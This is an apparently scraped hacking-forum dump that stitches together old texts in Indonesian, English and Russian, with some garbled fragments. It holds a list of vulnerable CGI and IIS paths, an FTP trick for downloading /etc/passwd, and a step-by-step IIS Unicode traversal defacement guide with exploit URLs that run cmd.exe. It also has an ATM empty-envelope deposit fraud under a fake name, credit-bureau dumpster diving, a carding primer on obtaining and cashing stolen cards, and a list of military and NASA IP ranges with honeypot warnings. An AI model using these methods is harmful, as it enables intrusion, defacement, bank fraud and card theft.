/>/cgi-bin/cgiback.cgi<br />/cgi-bin/cgi-lib.pl<br />/cgi-bin/cgitest.exe<br />/cgi-bin/cgiwrap<br />/cgi-bin/classified.cgi<br />/scripts/cart32.exe<br />/scripts/cart32.exe/cart32clientlist<br />/scripts/CGImail.exe<br />/scripts/convert.bas<br />/scripts/counter.exe<br />/scripts/cpshost.dll<br />/scripts/Fpadmcgi.exe<br />/scripts/fpcount.exe<br />/scripts/iisadmin/default.htm<br />/scripts/iisadmin/ism.dll<br />/scripts/iisadmin/samples/ctgestb.htx<br />/scripts/iisadmin/samples/ctgestb.idc<br />/scripts/iisadmin/samples/details.htx<br />/scripts/iisadmin/samples/details.idc<br />/scripts/iisadmin/samples/query.htx<br />/scripts/iisadmin/samples/query.idc<br />/scripts/iisadmin/samples/register.htx<br />/scripts/iisadmin/samples/register.idc<br />/scripts/iisadmin/samples/sample.htx<br />/scripts/iisadmin/samples/sample.idc<br />/scripts/iisadmin/samples/sample2.htx<br />/scripts/iisadmin/samples/viewbook.htx<br />/scripts/iisadmin/samples/viewbook.idc<br />/scripts/iisadmin/tools/ct.htx<br />/scripts/iisadmin/tools/ctss.idc<br />/scripts/iisadmin/tools/dsnform.exe<br />/session/adminlogin?RCpage=/sysadmin/index.stm<br />/session/admnlogin</p> <p>--------------------------------THE END-----------------------------</p> <p>Hacking Shell Melalui Ftp :</p> <p>Hacking shell melalui FTP<br />Berikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell.Cara ini menggunakan ftp protocol.Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.<br />Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server.berikut langkah langkahnya :<br />1.jalankan prompt<br />2.Tuliskan command untuk membuka dos command prompt<br />3.tuliskan ftp server.to.hack.com (nama servernya!!)<br />4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)<br />5.Akan muncul password login.. tekan saja enter...<br />6.sekarang ketiklah &quot;quote user ftp&quot; dan tekan enter<br />7.lalu ketik &quot;quote cwd ~root&quot; tekan enter<br />8.dan ketikan &quot;quote pass ftp&quot; tekan enter<br />Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin' shit with that<br />9.ketiklah &quot;cd etc&quot; tekan enter.. untuk mendapatkan -etc directory- yg berisi file password<br />10.ketiklah &quot;get passwd&quot; untuk mendownload passw.file ke HD mu</p> <p>Sekarang kamu suda memiliki password file dan kamu dapat membukanya di C:\passwd dengan menggunakan notepad<br />Jika file tersebut di enkripsi.. kamu bisa meng-crackernya.. dan jika tidak dienkripsi.. (You lucky) kamu dapat mencocokan antara user login dg passwordnya....</p> <p>DEFACE &amp; HACKING SHELL<br />1.Deface<br />Langkah 1 : Cari target<br />Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Untuk basicnya mengetahui OS yang digunakan server suatu site dapat diketahui dengan menggunakan site<a href="http://www.netcraft.com" rel="nofollow" target="_blank">http://www.netcraft.com</a>./ juga dapat dilakukan di search engine pada<a href="http://www.yahoo.com/" rel="nofollow" target="_blank">http://www.yahoo.com/</a>dengan menggunakan words .default.asp<br />Langkah 2 : Unicode<br />Setelah target didapat maka digunakan unicode. Unicode itu sendiri penulis juga belum tahu secara mendetail, tapi pada dasarnya unicode menggunakan bahasa ASCII.Server yg menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan unicode dalam hal ini bila server itu belum dipatch. Unicode yg berhasil ditemukan untuk memasuki server NT sudah banyak. dan yang bisa dicoba sbb:<br />http://target-loe/_vti_bin/..&#192;&#175;../..&#192;&#175;../..&#192;&#175;../winnt/system32/cmd.exe?/c+dir+c:\<br />http://target-loe/scripts/..&#192;&#175;../..&#192;&#175;../..&#192;&#175;../winnt/system32/cmd.exe?/c+dir+c:\<br />http://target-loe/msdac/..&#192;&#175;../..&#192;&#175;../..&#192;&#175;../winnt/system32/cmd.exe?/c+dir+c:\<br />http://target-loe/cgi-bin/..&#192;&#175;../..&#192;&#175;../..&#192;&#175;../winnt/system32/cmd.exe?/c+dir+c:\<br />http://target-loe/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\<br />bila unicode tsb berhasil maka akan dapat dilihat tampilan seperti berikut:<br />Directory of c:\ <br />06/03/01 09:59a (DIR) InetPub<br />08/08/01 06:14p (DIR) WINNT <br />Langkah 3 :cari file index.htm<br />Saat membuka browser site tsb pada ie kita melihat tampilan muka site tsb, perlu diperhatikan adalah file tampilan tsb link menuju file apa? biasanya antara lain :index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan unicode tsb kita mencari file tsb letaknya dimana, biasanya di c:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file dapat digunakan perintah :<br />/c+dir/s+c:\index.htm<br />hal ini berarti perintah mencari file index.htm di dalam drive c<br />untuk mencek apakah file index.htm tsb yg dipergunakan pada tampilan site, dipergunakan perintah :<br />/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm<br />setelah anda menemukan file index.htm tsb, maka sebaiknya anda copy dulu, hal ini agar tindakan deface kita tidak terlalu merugikan admin server site tsb.sehingga admin tsb mempunyai backup file index.<br />perintah copy itu sendiri adalah:<br />/c+copy+c:\<br />contoh untuk pencopyan adalah :/c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm<br />untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :<br />/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe<br />hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/<br />Langkah 4 : echo file index.htm<br />echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. untuk perintahnya adalah:<br />/deface.exe?/c+echo+&quot;deface+was+here&quot;+&gt;+c:\inetpub\wwwroot\index.htm <br />sehingga tampilan site depan telah terganti dengan tulisan <br />deface was here<br />catatan: hal ini berlaku bila file index.htm tsb dapat diecho, krn sebagian server membatasi direktory root dgn read only, sehingga perintah echo index.htm akan menghasilkan :<br />acces denied<br />untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa html dan ASCII<br />perintah-perintah lain :<br />membuat direktory = /c+mkdir+c:\<br />merubah nama file = /c+ren+c:\file<br />menghapus file = /c+del+c:\file</p> <p>--------------------------------THE END--------------------------------</p> <p>Hacking ATM </p> <p>Trick 1</p> <p>Preface:<br />-------<br />ATM's are nothing new, banks have been using them for years,<br />and now you see them being used more than ever, and are becoming<br />more and more widespread. This, of course, just opens up more<br />ways to make money, and I am again bringing you another safe and<br />proven technique of improving your cash flow.</p> <p>Banks:<br />-----<br />As mentioned, almost all banks nowadays have ATM machines.<br />Grab the local phone book and start calling banks. What you want<br />to know is &quot;What is the most I can take out of an ATM machine right<br />after I deposit a check?&quot; Most banks range anywhere from $50 to<br />$1000. This is for when you make a deposit via the ATM, and then<br />right away make a withdraw against the funds on the check, even<br />though the check hasn't been verified. I'm sure you can see what's<br />coming.</p> <p>Account:<br />-------<br />Open a savings account at the bank that offers the highest<br />amount of ATM withdraw. Use a fake name (of course) and apply for<br />the ATM card too. You might even tell them that you need the ATM<br />card because you work odd hours, so it is difficult for you to get<br />to the banks when they are open.</p> <p>Deposit:<br />-------<br />Soon you will get your ATM card in the mail, and it should be<br />sent to your mailing address that would be a lot like a drop for<br />carding. You should be able to figure out how to do that. Take<br />your ATM card and go to the banks ATM machine. Select DEPOSIT<br />and when it asks for amout, type in $999.00. DO NOT deposit an<br />amount OVER $1000! This is important because then the check will<br />have to wait for bank clearance, which means that you'll be screwed.<br />When it's time to insert the deposit into the slot on the ATM, insert<br />an empty envelope. For all the ATM knows, this was just a check for<br />$999.00, and now places your account ledger at $999.00. Now you are<br />free to withdraw up to the full $1000 that you are allowed. Since<br />you never really put in any money, this is all free money coming out!</p> <p>I've done this myself and got $950 out of a machine. It was a HUGE<br />stack of twenties! Just be on the watch for cameras!</p> <p>Have fun.</p> <p>Trick 2</p> <p>Have you ever looked longingly upon the sight of your local PULSE machine<br />and thought, &quot;There must be some way that I can make some money REAL easy<br />here.&quot;?</p> <p>Well, there is. But it won't be easy. Protection methods can be overcome,<br />but the technology involved must be understood IN ITS ENTIRETY before an<br />[PAUSE] attempt at illegal access is to be made. There are hundreds of pe<br />ople,<br />guests of the state, that figured their plans infallible, only to fall<br />victim to a well-hidden camera.</p> <p>This article will not be a lesson on HOW to break into the machine, it is<br />merely a summary of the operations involved with a normal ATM transaction.<br />This information is being presented on a &quot;for information's sake&quot;-only<br />basis. I, Count Zero, do not promote nor remotely condone any illegal<br />acts of any sort. So there.</p> <p>I. MAGNETIC STRIP FORMAT</p> <p>This would seem to be the most efficient method of trying to access illegal<br />sums of cash. You could:</p> <p>a. steal somebody's card and PIN code<br />b. synthesize a card<br />c. attempt to &quot;jackpot&quot; the system</p> <p>We will only look at option B. As &quot;A&quot; is up to your own devices and &quot;C&quot; has<br />several good text files written about it already. So &quot;B&quot; it is.</p> <p>[PAUSE] Let's look at the format of the data written to the magnetic strip<br />s. This<br />has been taken from a recent HARTWELL, INC manual.</p> <p>[ XX XX XX XX XX XX XX XX ] [ YYYY ] [ - 20 CHARS - ] [ ZZ ZZ ZZ ] [ CC CC ]<br />\-----------------------/ \------/ \--------------/ \----------/ \-------/<br />Your individual acct. PIN Name of card Bank route CHKSUM<br />number/serial code Code issuee code/rem.</p> <p>-gwy 03133-ITT: call reset (c 0,d 85): dte originated<br />,Q) : </p> <p>N I Z A T I O N P R E S E N T S</p> <p>XXXXXXXXXXXXXXXXXXXXXXXX<br />XX XXXX XXXX XXXX XX<br />XXX XX XXXXXX XX XXX<br />XXXX XXXXXXXX XXXX<br />XXX XX XXXXXX XX XXX<br />XX XXXX XXXX XXXX XX<br />XXXXXXXXXXXXXXXXXXXXXXXX</p> <p>&quot;HOW TO LOGIN TO A C.B.I. SYSTEM&quot;</p> <p>WRITTEN BY: L.E. PIRATE</p> <p>THANKS TO: ZANGIN</p> <p>The following is the login procedure to login to a C.B.I. system,<br />a few C.B.I. login port numbers, information on the system, and obtain C.B.I.<br />accounts.</p> <p>*** HOW TO GET CBI INFORMATION ***</p> <p>Ok, you can get CBI accounts and CBI printouts at your local mall.<br />The best places to check are: Insurance Places, Lawyers, Doctors, and Car<br />Dealerships, and check some places in the mall that might have to check a <br />person's credit. Trash in their dumpster looking for printouts. Most places<br />buffer capture their whole call to CBI including the number, everything on<br />buffer, it's better than christmas. Ok, so look obtain these CBI printouts<br />and cruise home to the old computer.<br />-----------------------------------------------</p> <p>enjoy,</p> mybb@mybb.ru (Kasper) Thu, 07 Jan 2010 18:27:02 +0300 https://kasper.7li.ru/viewtopic.php?pid=27#p27 https://kasper.7li.ru/viewtopic.php?pid=26#p26 <p>Добрый вечер дамы и господа! Сегодня у нас на повестке дня кардинг.<br />Наверное, многие из вас догадываются, что это такое (ну а для тех,<br />кто не знает, прошу - моя первая статья) Итак, что же это за зверь,<br />с помощью которого можно стать или очень богатым или огрести таких<br />пиздюлей, что мало не покажется!!!<br />Во первых кардинг - уголовно наказуемое преступление, хотя конечно<br />же не тоже что и вооруженное ограбление, но всё же это преступление.<br />Но это обратная сторона медали, а теперь давайте рассмотрим ту самую,<br />из-за которой так много людей хотят заниматься этим. Имея данные о<br />карте и о владельце, можно эту карту продать другим кардерам, а можно<br />завалиться в онлайн магазин и скупить там всё под чистую, хотя последнее<br />весьма не рекомендуется, так как могут прийти люди в кирзовых сапогах =) .<br />Разберем теперь систему функционирования кредиток. Они появились давно,<br />и по идее должны были стать удобным средством расчета, которое трудно<br />украсть(!) и нелегально использовать(!). На каждую карту нанесен<br />16значный номер ФИО владельца Exp.data(типа срока годности =) и ещё у<br />каждой карты есть пин код. Поэтому использовать их в реальной жизни<br />очень трудно (владелец при малейшем подозрении просто позвонит в банк<br />и заблокирует счёт). Есть дохрена различных типов карт, которые выдаются<br />банком эмитентом (этим мудреным словом зовется банк, выдавший карту).<br />Основными являются = MasterCard, Eurocard, Visa и пр. пр. пр.<br />Разберем теперь способы получения этих заветных карт :<br />1. самый популярный способ, это сделать фейковый (поддельный) магазин,<br />торгующий через интернет, или порно сайт, оплата в них будет вестись,<br />конечно же, кредитками.<br />Если его правильно разрекламировать, то можно получить<br />постоянный приток новеньких кредиток!<br />2. Можно попытаться взломать какой-нибудь интернет магазин, но для этого<br />надо быть хорошим взломщиком (по-моему, сейчас инет магазинам запретили<br />хранить у себя данные о карте, и о владельце)<br />3. Бывает, что на сайтах кардерской тематики выкладывается списки с<br />кредитками, которыми можно воспользоваться на халяву, минус у этого<br />способа в том, что такие карты быстро становятся не валидными!<br />4. Этот способ популярен у новичков, он заключается в том, чтобы<br />просто купить карту, благо сайтов торгующих ими развелось, как …<br />5. Ну и на конец, их можно стрейдить (поменять на че-нить ценное) у<br />других кардеров<br />Не думайте, что в этой статье приведены все способы по добыче cc(credit card)<br />Есть ещё такие извращенные, как trashing (от англ. рытьё в мусоре<br />Часто компании имеющие дело с кредитными картами, выбрасывают в мусор<br />документы, в которых содержаться данные о карте и о владельце,<br />наша задача в этом случае найти, куда этот мусор вывозят,<br />порыться в нем и получить таки cc) или социальная инжинерия.<br />А что же дальше спросишь ты, что мне делать с этими кредитками?<br />Ну, конечно же, ты можешь оплатить доступ к платному порносайту,<br />зарегистрировать прогу, которая вечно требует денег и орет про<br />оставшиеся 30 дней.<br />Но самым правильным способом является обналичка денег с кредитки,<br />через пайпал(платежная система), мерчант и тд. Об этом я расскажу<br />позднее.<br />Лирическое отступление = <br />Кардинг набирает обороты не только у нас в стране, но и<br />по всему миру. Цены на карточки колеблются от10 центов до<br />2-3 баксов в зависимости от карты и покупаемого количества.<br />Столицей мирового кардинга является славный город Санкт Петербург,<br />основными продавцами кредитных карт являются жители России и ближнего<br />зарубежья, а жертвами в становятся жители США и Европы.</p> mybb@mybb.ru (Kasper) Thu, 07 Jan 2010 18:23:01 +0300 https://kasper.7li.ru/viewtopic.php?pid=26#p26 https://kasper.7li.ru/viewtopic.php?pid=25#p25 <p>6.*.*.*: Центр Систем Информации Aarmy<br />21.*.*.*: Американское Агентство Систем Информации Защиты<br />22.*.*.*: Агентство Систем Информации Защиты<br />24.8. * @Home, США<br />24.88. [Roadrunner, США<br />24.112. [@Home, Канада<br />24.132. [A2000, Нидерланды<br />24.188.*.*: Корпорация Систем Cablevisio (США)<br />26.*.*.*: Агентство Систем Информации Защиты<br />29.*.*.*: Агентство Систем Информации Защиты<br />30.*.*.*: Агентство Систем Информации Защиты<br />49.*.*.*: Соединить Тактическую Команду<br />50.*.*.*: Соединить Тактическую Команду<br />53.*.*.* DaimlerChrysler AG<br />55.*.*.*: Армейское Бюро Национальной гвардии<br />62.0.0.1 - 62.30.255.255<br />62.52.*.*: Commundo<br />62.52.*.*: Debitel<br />62.62.*.*: lahm (9 французов Онлайн)<br />62.69.140.*: AddCOM<br />62.96.*.*: I-сеть<br />62.137 * Freeserve, Великобритания<br />62.150.*.*: еще раз 62.255.*.* T-Online<br />62.156.*.*: Erotik-Велт<br />62.157.*.*: 1 и 1<br />62.158. [T-Online, Германия<br />62.180.*.*: Селекторная связь Планеты<br />64.9. * Adelphia, США<br />64.44. * Дарвинское Сообщество(Община) Сетей, США<br />64.224.*: (honeypot ФБР)<br />64.225.*: (honeypot ФБР)<br />64.226.*: (honeypot ФБР)<br />80.*.*.*: lahm<br />81.*.*.*: lahm<br />128.4.0.0: Университет Делавэра<br />128.8.0.0: Университет Штата Мэриленд<br />128.10.0.0: Университет Purdue<br />128.11.22.0 - 128.11.22.255: Yahoo, Inc.<br />128.11.23.0 - 128.11.23.255: Yahoo, Inc.<br />128.11.68.0 - 128.11.68.255: Yahoo, Inc (NETBLK-FOUR11DS559-68-19)<br />128.11.69.0 - 128.11.69.255: Yahoo, Inc (NETBLK-FOUR11DS216-69-19)<br />128.11.70.0 - 128.11.70.255: Yahoo, Inc (NETBLK-FOUR11DS698-70-19)<br />128.11.71.0 - 128.11.71.255: Yahoo, Inc (NETBLK-FOUR11DS699-71-20)<br />128.11.96.32 - 128.11.96.63: FortuneCity Ltd.<br />128.36.0.0 Йельский Университет (ЧИСТАЯ ЙЕЛЬСКАЯ СЕТЬ)<br />128.37.0.0: Армейский Yuma Доказательство Основания(Земли)<br />128.38.0.0 Военно-морской Поверхностный Центр Войны (NET-NSWC-NET)<br />128.39.0.0 Телекоммуникационная Администрация orwegian (СЕТЬ-NTANET)<br />128.40.0.0 Университетский Колледж Лондон (NET-UCL-ETHERNET)<br />128.41.0.0 Университетский Колледж Лондон (&quot;чистое замкнутое обслуживание(служба) углеродистой стали&quot;)<br />128.42.0.0 Университет Риса (ЧИСТАЯ СЕТЬ РИСА)<br />128.43.0.0 Защита Researc<br />128.47.*.*: Армейская Команда Электроники Коммуникаций (СЕТЬ-TACTNET)<br />128.50.*.*: Министерство обороны (ЧИСТЫЕ МОНЕТЫ)<br />128.51.*.*: Министерство обороны (СЕТЬ-COINSTNET)<br />128.56.*.*: Американское Военно-морское училище (NET-USNA-NET)<br />128.63.*.*: Армейская Научно-исследовательская лаборатория Баллистики (ЧИСТАЯ ПОДСЕТЬ БАРРЕЛЯ)<br />128.80.*.*: Армейская Команда Электроники Коммуникаций (CECOM) (СЕТЬ-CECOMNET)<br />128.98.*.*: Оценка Защиты и Агентство Исследования (NET-DERA-UK)<br />128.99.0.0 Northrop Grumman Корпорация - Лаборатория Наук Автоматизации (NET-NORTHROP-NET)<br />128.100.0.0 Университет Вычисления(Вычислительной техники) Торонто и Коммуникаций (ЧИСТЫЙ ТОРОНТО)<br />128.101.0.0 Университет Штата Миннесота (NET-UMN-NET)<br />128.102.0.0: НАСА Исследовательский центр Ames<br />128.103.0.0 Университет Гарварда (СЕТЬ-HARVA<br />128.149.0.0: Штаб НАСА<br />128.150.0.0 Национальный Фонд(Основа) Науки (NET-NSF-LAN)<br />128.151.0.0 Университет Рочестера (ЧИСТАЯ СЕТЬ УРА)<br />128.152.0.0 Электроника Hughes (СЕТЬ - ЦВК-ENET)<br />128.153.0.0 Университет Clarkson (СЕТЬ-CLARKSON)<br />128.154.*.*: НАСА Бьет Средство(Ссуду) Полета(Рейса) (NET-WFF-NET)<br />128.155.*.*: Исследовательский центр Лэнгли НАСА (NET-LARC-NET)<br />128.156.*.*: НАСА Центр Контроля(Управления) Льюиса Нетуорка (СЕТЬ - LERC)<br />128.157.*.*: НАСА Космический центр Джонсона (NET-JSC-NET)<br />128.158.*.*: НАСА Исследовательский центр Ames (NET-MSFC-NET)<br />128.159.*.*: НАСА Исследовательский центр Ames (NET-KSC-NET)<br />128.160.*.*: Военно-морская Научно-исследовательская лаборатория (СЕТЬ - SSCNET)<br />128.161.*.*: НАСА Исследовательский центр Ames (NET-NSN-NET)<br />128.183.*.*: НАСА Центр Полета(Рейса) Места(Космоса) Goddard (СЕТЬ-GSFC)<br />128.190.0.0: Армия Belvoir Reasearch и Центр Развития<br />128.216.*.*: Авиационная база ВВС MacDill (NET-CC-PRNET)<br />128.217.*.*: НАСА Космический центр Kennedy (NET-NASA-KSC-OIS)<br />128.236.*.*: Американская Академия Воздушных сил (NET-USAFA-NET<br />129.11.0.0: Университет Лидса (ЧИСТЫЙ ЛИДС)<br />129.12.0.0: Университет Кента в Кентербери (СЕТЬ-UKC)<br />129.13.0.0: Университет Карлсруэ<br />129.48.0.0: Авиационная база ВВС Мастера-Patterson<br />129.50.0.0: НАСА Маршальский Космический Центр Полета(Рейса) (СЕТЬ-PSCN)<br />129.51.0.0: Авиационная база ВВС Патрика (ЧИСТЫЙ НЕ УТОЧНЕНО) PAFB)<br />129.52.0.0: Авиационная база ВВС Мастера-Patterson<br />129.54.0.0: Авиационная база ВВС Vandenberg<br />129.69.0.0: Университет Штутгарта (NET-NI-STG-NET)<br />129.70.0.0: Университет Билефельда<br />129.73.*.*: Siemens<br />129.92.0.0: Институт Воздушных сил Технологии<br />129.99.0.0: НАСА Исследовательский центр Ames<br />129.139.0.0: Армейское Развитие Исследования Вооружения и Проектирующий Центр<br />129.163.0.0: Космический центр NASA/Johnson (NET-NASA-JSCSSE)<br />129.164.0.0: НАСА IVV (ЧИСТЫХ-E) НАСА-IVV)<br />129.165.0.0: НАСА Центр Полета(Рейса) Места(Космоса) Goddard (NET-NASA-GSFCSSE)<br />129.166.0.0: НАСА - Космический центр Джона Ф. Кеннеди (NET-NASA-JFKSSE)<br />129.167.0.0: НАСА Маршальский Космический Центр Полета(Рейса) (NET-NASA-MSFCSSE)<br />129.168.0.0: НАСА Исследовательский центр Льюиса (NET-NASA-LRCSSE)<br />129.187.0.0: Leibniz-Rechenzentrum der Bayerischen Akademie<br />129.198.0.0: Центр Летного испытания Воздушных сил<br />129.209.0.0: Армейская Научно-исследовательская лаборатория Баллистики<br />129.217.0.0: Университет Дортмунда<br />129.229.0.0: Армия США Корпус Инженеров<br />129.233.0.0: Fraunhofer Institut f&#252;r Produktionstechnik u. Automatisierung<br />129.251.0.0: Академия Воздушных сил Соединенных Штатов</p> <p>130.40.0.0: НАСА Космический центр Джонсона<br />130.75.0.0: Университет Ганновера<br />130.112.0.0: Фонд(Основа) Исследования Энергии Нидерландов ECN<br />130.114.0.0: Армейский Абердин, Доказывающий Установку Основания(Земли) Поддерживает Деятельность (СЕТЬ-APGNET)<br />130.115.0.0: Университет Эрасмуса Роттердам<br />130.123.0.0: Университет Massey<br />130.133.0.0: Freie Universitaet Берлин</p> <p>130.165.0.0: Корпус U.S.Army Инженеров<br />130.167.0.0: Штаб НАСА<br />130.183.0.0: Мех Max-Planck-Institut Plasmaphysik<br />130.211.0.*: UUNet<br />130.241.0.0: Университет Gothenburg (ЧИСТАЯ СЕТЬ ГАЗОБЕНЗИНОВОЙ УСТАНОВКИ)<br />130.247.0.0: Самолет Вооруженных сил(Военных) Боинга<br />131.3.0.0 - 131.3.255.255: Авиационная база ВВС Mather<br />131.6.0.0: Авиационная база ВВС Лэнгли<br />131.10.0.0: Авиационная база ВВС Barksdale<br />131.17.0.0: Авиационная база ВВС Шеппарда<br />131.21.0.0: Авиабаза Hahn (СЕТЬ-HAHNNET)<br />131.22.0.0: Авиационная база ВВС Keesler<br />131.25.0.0: Авиационная база ВВС Патрика<br />131.35.0.0: Авиационная база ВВС Fairchild<br />131.36.0.0: Авиабаза Yokota<br />131.37.0.0: Авиационная база ВВС Elmendorf<br />131.38.0.0: Авиационная база ВВС Hickam<br />131.40.0.0: Авиационная база ВВС Bergstrom<br />131.44.0.0: Авиационная база ВВС Рандолфа<br />131.47.0.0: Авиационная база ВВС Andersen<br />131.50.0.0: Авиационная база ВВС Дэвиса-Monthan<br />131.54.0.0: Сеть Концентратора Воздушных сил<br />131.61.0.0: Авиационная база ВВС McConnell<br />131.62.0.0: Авиационная база ВВС Нортона<br />131.92.0.0: Армейская Информационная Команда Систем - Абердин<br />131.110.0.0: Средство(Ссуда) Собрания NASA/Michoud<br />131.121.0.0: Военно-морское училище Соединенных Штатов<br />131.122.0.0: Военно-морское училище Соединенных Штатов<br />131.155. [Эйндховенский Университет, Нидерланды<br />131.169.0.0: Deutsches Elektronen Синхротрон<br />131.174. * Университет Неймегена, Нидерланды<br />131.176.0.0: Европейский Космический Центр Операций(Действий)<br />131.182.0.0: Штаб НАСА<br />131.188.0.0: Университетский Erlangen Нюрнберг<br />131.211.0.*: UUNet<br />131.220.0.0: Университет Бонна<br />131.236.0.0: Университетский Колледж, австралийская Академия Силы Защиты<br />131.246.0.0: Университетский Кайзерслаутерн<br />132.68. [Технологический Институт, Израиль<br />132.95.0.0 - 132.108.0.0???<br />134.2.0.0: Universitaet Tuebingen<br />134.11.0.0: Пентагон (СЕТЬ-PENTNET)<br />134.12.0.0: НАСА Исследовательский центр Ames<br />134.21.0.0: Университет Фрибура<br />134.78.0.0: Армейская Информационная Команда-ATCOM Систем<br />134.80.0.0: Армейская Информационная Команда Систем<br />134.91.*.*: Универ Дуйсбург<br />134.95.*.*: Универ K&#246;ln<br />134.118.0.0: Космический центр NASA/Johnson<br />134.147.0.0: Рур-Universitaet Бохум<br />134.155.0.0: Университет Мангейма<br />134.164.0.0: Армейская Станция Эксперимента Водных путей Инженера<br />134.176.0.0: Universitaet Giessen<br />134.194.0.0: Армия США Абердинский Испытательный Центр<br />134.229.0.0: Морской Региональный Центр Автоматизации Данных<br />134.230.0.0: Морской Региональный Центр Автоматизации Данных<br />134.240.0.0: Американская военная Академия<br />134.245.0.0: Universitaet Киль<br />136.156.0.0: Европейский Центр Среднего диапазона Прогнозов погоды<br />136.172.0.0: Deutsches Klimarechenzentrum<br />136.178.0.0: Сеть Исследования НАСА<br />136.199.0.0: Universitaet Трир<br />137.1.0.0: Авиационная база ВВС Белого<br />137.2.0.0: Авиационная база ВВС Джорджа<br />137.3.0.0: Авиационная база ВВС Литл-Рока<br />137.5.0.0: Сеть Концентратора Воздушных сил<br />137.6.0.0: Сеть Концентратора Воздушных сил<br />137.12.0.0: Сеть Концентратора Воздушных сил<br />137.223.0.0: Siemens Системы Информации Nixdorf<br />137.226.0.0: Ахенский Университет Технологии<br />137.240.0.0: Команда Материальной части Воздушных сил<br />137.242.0.0: Команда Логистики Воздушных сил<br />137.250.0.0: Университет Аугсбурга (СЕТЬ-AUX)<br />137.251.0.0: Fraunhofer-Institut f&#252;r Arbeitswirtschaft und Организация<br />138.13.0.0: Команда Систем Воздушных сил<br />138.27.0.0: Армейская Информационная Команда Систем<br />138.30.0.0: Национальное Космическое Агентство Развития Японии<br />138.61.0.0: Майнц<br />138.76.0.0: Штаб НАСА<br />138.115.0.0: НАСА Информационная и Электронная Лаборатория Систем<br />138.136.0.0 - 138.136.255.255: Морские Компьютеры и Телекоммуникационная Станция<br />138.137.0.0: Морской Региональный Центр Автоматизации Данных<br />138.139.0.0: Аэродром Морской пехоты<br />138.140.0.0: Морской Региональный Центр Автоматизации Данных<br />138.141.0.0: Морской Региональный Центр Автоматизации Данных<br />138.142.0.0: Морской Региональный Центр Автоматизации Данных<br />138.143.0.0: Морской Региональный Центр Автоматизации Данных<br />138.156.0.0: Морская пехота Центральный Проект и Прогр Деятельность<br />138.158.0.0: Морская пехота Центральный Проект и Прогр Деятельность<br />138.168.0.0: Морская пехота Центральный Проект и Прогр Деятельность<br />138.193.0.0: Ручей НАСА / Желтый Ручей<br />139.2.0.0: Университет Дортмунда<br />139.4.0.0: EUnet Deutschland GmbH<br />139.5.0.0: Университет Дортмунда<br />139.6.0.0: Fachhochschule K&#246;ln<br />139.7.0.0: Mannesmann Mobilfunk GmbH<br />139.8.0.0: S and P Media GmbH<br />139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)<br />139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)<br />139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)<br />139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)<br />139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)<br />139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)<br />139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)<br />139.11.0.0: Universit&#228;t der Бундесвер Гамбург<br />139.13.0.0: Fachhochschule Вильгельмсхафен<br />139.14.0.0: Кобленцский ландо Universit&#228;t<br />139.15.0.0 - 139.15.255.255: Robert Bosch GmbH<br />139.17.0.0: Geo-Forschungs-Zentrum Потсдам<br />139.18.0.0: Universit&#228;t Лейпциг (NET-UNILE-LAN)<br />139.19.0.0: Max-Planck-Institut f&#252;r Informatik<br />139.20.0.0 - 139.20.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC<br />139.20.0.0 - 139.29.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC<br />139.21.0.0: Услуги Бизнеса Siemens<br />139.22.0.0: Услуги Бизнеса Siemens<br />139.23.0.0: Услуги Бизнеса Siemens<br />139.25.0.0: Услуги Бизнеса Siemens<br />139.27.0.0 - 139.27.255.255: Thyssen Stahl AG<br />139.28.0.0: Bremer Vulkan AG<br />139.30.0.0: Университет Ростока<br />139.75.0.0: Альфред Ведженер Назначает для Полярного и Морского Исследования<br />139.88.0.0: НАСА Исследовательский центр Льюиса<br />139.142.*.*: Передняя дверь конца сети безопасности, фильтрующей сотни ДЮЙМА В СЕКУНДУ подписки клиента. Если Вы находите уязвимый паб, IIS, SQL, или *nix - ОСТАВЛЯЮТ IT в покое<br />139.161.0.0: Армейская Информационная Команда Систем<br />139.169.0.0: Космический центр NASA/Johnson<br />139.229.0.0: НАСА Исследовательский центр Ames<br />140.139.0.0: ШТАБ - КВАРТИРА американская Армейская Медицинская Научно-исследовательская Команда<br />140.239.81.184 - 140.239.81.191: Морская Биологическая Лаборатория<br />141.0.0.0 - 141.255.255.255: Быстро nur Немецкий Firmen<br />144.99.0.0 Армейская Информационная Команда Систем Соединенных Штатов (NET-CRLSLBKS-NET)<br />144.109.0.0 Армейская Информационная Команда Систем (СЕТЬ-NCMBRLNDNET)<br />144.143.0.0 Штаб, Третья Армия Соединенных Штатов (СЕТЬ-AC2IS)<br />144.144.0.0 Штаб, 